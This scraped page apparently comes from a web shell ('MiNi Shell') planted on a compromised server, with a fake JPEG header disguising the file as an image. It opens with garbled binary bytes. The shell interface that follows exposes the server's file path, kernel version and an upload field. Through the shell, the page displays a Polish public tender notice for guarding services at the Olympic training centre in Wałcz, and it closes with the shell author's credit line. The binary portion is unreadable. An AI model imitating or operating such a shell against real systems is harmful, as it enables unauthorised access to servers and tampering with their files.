JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230623/0027340201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi ochrony mienia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRALNY OŚRODEK SPORTU - OŚRODEK PRZYGOTOWAŃ OLIMPIJSKICH W WAŁCZU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 14273335600028</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Zdobywców Wału Pomorskiego 99</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.walcz@cos.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://walcz.cos.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> kultura fizyczna </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Paweł Węgrzynowski</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">7651566048</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Al. Zdobywców Wału Pomorskiego 99, 78-600 Wałcz</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Wałcz</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">78-600</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">p.wegrzynowski@cos.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://www.bip.cos.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi ochrony mienia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f31a22cb-11ab-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00273402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f31a22cb-11ab-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym, a<br/>wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem strony internetowej<br/>https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dot. korespondencji elektronicznej zawarte są w rozdziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług ochrony mienia zamawiającego w rozumieniu art. 2 pkt 5 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, którą należy objąć mienie znajdujące się na terenie Centralnego Ośrodka Sportu – Ośrodka Przygotowań Olimpijskich w Wałczu. Ochrona, o której mowa w zdaniu pierwszym będzie wykonywana w następujący sposób:<br/>1)	całodobowa bezpośrednia ochrona fizyczna mienia zamawiającego realizowana będzie w zależności od pory dnia:<br/>a)	od godz. 6.00 do godz. 18.00 – przez jedną osobę (całodobowa obsługa portierni) – pierwsza zmiana,<br/>b)	od godz. 18.00 do godz. 6.00 – przez dwie osoby, (w tym całodobowa obsługa portierni) – druga zmiana,<br/>2)	informowanie recepcji zamawiającego o wjazdach pojazdów w godzinach nocnych;<br/>3)	wykorzystywanie, nadzorowanie, aktywowanie i dezaktywowanie istniejącego system alarmowego SSWiN;<br/>4)	współpraca z systememi monitorowania sygnału pożarowego w budynku internatu sportowego Stadion, w tym informowanie o czasowych wyłączeniach systemów, potwierdzania lub anulowanie wystąpienia sygnalizacji pożaru, aktywowanie lub dezaktywowanie systemu;<br/>5)	podejmowanie natychmiastowych działań interwencyjnych w przypadku zadziałania sygnalizacji alarmów przeciwpożarowych, zgodnie z obowiązującą instrukcją pożarową;<br/>6)	zapewnienie patrolu prewencyjnego obejmującego jeden przyjazd na teren Zespołu „A”, Zespołu „B”, „Pasieki” i Pawilonu Sędziowskiego z torem regatowym codziennie w godz. 10.00 – 19.00 i jeden przyjazd na teren Zespołu „A”, Zespół „B”, „Pasieki” i Pawilonu Sędziowskiego z torem regatowym codziennie w godz. 24.00 – 7.00 (zamawiający dopuszcza podwykonawstwo);<br/>7)	zapewnienie patrolu interwencyjnego z czasem dojazdu w godz. 7.00 – 20.00 do 10 min., w godz. 20.00 – 7.00 do 5 min. (zamawiający dopuszcza podwykonawstwo);<br/>8)	wykorzystywanie systemu monitoringu wraz z podglądem i rejestracją nagrań od dnia ich protokolarnego przekazania do dnia zakończenia wykonywania przedmiotu zamówienia;<br/>9)	znajomość rozkładu pomieszczeń i dróg ewakuacyjnych w poszczególnych budynkach i na terenie zamawiającego, znajomość rozmieszczenia i umiejętność obsługi głównych wyłączników prądu, p.poż., zaworów wodnych oraz wyłączników urządzeń podtrzymujących napięcie na terenie zamawiającego, znajomość numerów telefonów do pogotowia technicznego, serwisów oraz osób funkcyjnych obiektu;<br/>10)	izolowanie bezdomnych lub dzikich zwierząt w celu przekazania ich odpowiednim podmiotom;<br/>11)	prawidłowe reagowanie na mogące wystąpić sytuacje nagłe i awaryjne związane z instalacjami, w szczególności: p.poż., włamaniowymi, elektrycznymi, centralnego ogrzewania, wodno-kanalizacyjnymi, komputerowymi;<br/>12)	ścisła współpraca z osobą wyznaczoną ze strony zamawiającego w zakresie ochrony, bezpieczeństwa i obowiązującego porządku u zamawiającego oraz codzienne informowanie o wszelkich zauważonych szkodach, wadach i nieprawidłowościach;<br/>13)	prowadzenie stanowiska informacji, oraz udzielanie informacji interesantom i kierowanie ich do właściwych komórek organizacyjnych;<br/>14)	nadzorowanie ruchu pojazdów na terenie Ośrodka oraz pracy systemu parkingowego, w szczególności: <br/>a)	podejmowanie natychmiastowych działań interwencyjnych w przypadku wystąpienia jakichkolwiek usterek,<br/>b)	prawidłowe reagowanie na mogące wystąpić sytuacje nagłe i awaryjne związane z pracą systemu parkingowego, w tym kontakt z serwisem urządzenia,<br/>c)	weryfikacja wniesienia przez użytkowników parkingu opłat należnych za postój pojazdu w przypadkach problemów z wyjazdem,<br/>d)	monitorowanie poprawności działania systemu parkingowego przy pomocy programów komputerowych.<br/>15)	prowadzenie książki dyżurów;<br/>16)	wykonywanie dodatkowych czynności na polecenie osób uprawnionych, zgodnych z charakterem wykonywanej pracy;<br/>17)	wyposaży pracowników ochrony w jednolite (jednakowe) ubranie lato/zima z widocznym logo wykonawcy. Pracownicy ochrony będą posiadać identyfikator osobisty wraz z numerem służbowym. Pracownicy ochrony będą uzbrojeni i wyposażeni w środki przymusu bezpośredniego zgodnie z obowiązującym planem ochrony lub instrukcją obiektową, w przypadkach, gdy zezwalają na ich uzbrojenie lub wyposażenie przepisy prawa; <br/>18)	wykonawca przedstawi zamawiającemu, do jego akceptacji, w dniu zawarcia umowy listę pracowników ochrony, którzy będą świadczyć usługi ochrony w ramach wykonywania przedmiotu zamówienia wraz z ich uprawnieniami. Zdanie pierwsze ma odpowiednie zastosowanie do zmiany na liście pracowników;<br/>19)	przedmiot zamówienia będzie wykonywany tylko przez pracowników ochrony w rozumieniu art. 2 pkt 5 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia. Wykonawca może zastąpić bez zgody zamawiającego pracowników ochrony świadczących usługi ochrony jedynie osobami posiadającymi niezbędne doświadczenie oraz tożsame uprawnienia do wykonywania przedmiotu zamówienia;<br/>20)	jeśli wykonawca poweźmie wiadomość, że wobec któregokolwiek pracownika ochrony postawiono zarzut popełnienia przestępstwa, za które może zostać orzeczony zakaz zajmowania określonego stanowiska, wykonywania określonego zawodu lub prowadzenia określonej działalności gospodarczej, a orzeczenie takiego zakazu mogłoby mieć znaczenie dla zaufania zamawiającego do wykonawcy lub wpływ na przebieg wykonywania przedmiotu zamówienia lub że wszczęto postępowanie dyscyplinarne lub przedsięwzięto inne, podobne procedury, wykonawca zobowiązany jest niezwłocznie zawiadomić na piśmie o tym fakcie zamawiającego, a na pisemne żądanie zamawiającego zastąpić tego pracownika ochrony osobą o kwalifikacjach i doświadczeniu akceptowalnych przez zamawiającego. Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z usunięcia lub wymiany pracownika ochrony;<br/>21)	zamawiający zapewni wykonawcy odpowiednie warunki wykonywania przedmiotu zamówienia poprzez nieodpłatne i na wyłączność użyczenie pomieszczeń wraz z niezbędnym wyposażeniem technicznym, sanitarnym i socjalnym;<br/>22)	wykonawca przejmując od zamawiającego pomieszczenia odpowiedzialny jest za ich prawidłowe wykorzystywanie, tj. wyłącznie w celu wykonywania przedmiotu zamówienia z zachowaniem stanu niepogorszonego, za wyjątkiem zmian wynikających ze zwykłego użycia. Przejęcie pomieszczeń nastąpi na podstawie protokołu zdawczo – odbiorczego najpóźniej na dzień przed rozpoczęciem wykonywania przedmiotu zamówienia;<br/>23)	wykonawca będzie prowadził książkę dyżurów, do której pracownicy ochrony wpisywać będą wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony. W terminie do 5. dnia następującego po miesiącu świadczenia usług, wykonawca będzie składał zamawiającemu miesięczną książkę dyżurów prowadzoną w poprzednim miesiącu;<br/>24)	wykonawca będzie utrzymywał czystość i porządek w pomieszczeniu dyżurki oraz na zewnątrz dyżurki w bezpośrednim otoczeniu wjazdu do zamawiającego (zamiatanie, usuwanie liści, odśnieżanie, posypywanie wjazdu piaskiem itp.).<br/><br/>2.	Przedmiot zamówienia będzie wykonywany przy udziale co najmniej jednej osoby niepełnosprawnej w rozumieniu art. 1 ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych na każdej zmianie.<br/><br/>3.	Warunki dotyczące wykonywania zamówienia zostały określone w załączniku nr 2 do specyfikacji warunków zamówienia, zwanej dalej „SWZ” (projektowane postanowienia umowy w sprawie zamówienia publicznego).<br/><br/>4.	Nazwy i kody określone we Wspólnym Słowniku Zamówień: Usługi ochroniarskie - 79710000-4. <br/><br/>5.	Powodem niedokonania podziału zamówienia na części jest niepodzielność przedmiotu świadczenia (niepodzielność usługi ochrony mienia zamawiającego). <br/><br/>Ponadto potrzeba skoordynowania działań różnych wykonawców realizujących poszczególne części zamówienia (świadczenie usługi ochrony zmienia zamawiającego) mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia. <br/><br/>Ponadto niedokonanie podziału zamówienia na części, z uwagi na jego niewielki zakres i rozmiar, nie utrudni konkurencji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma: https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com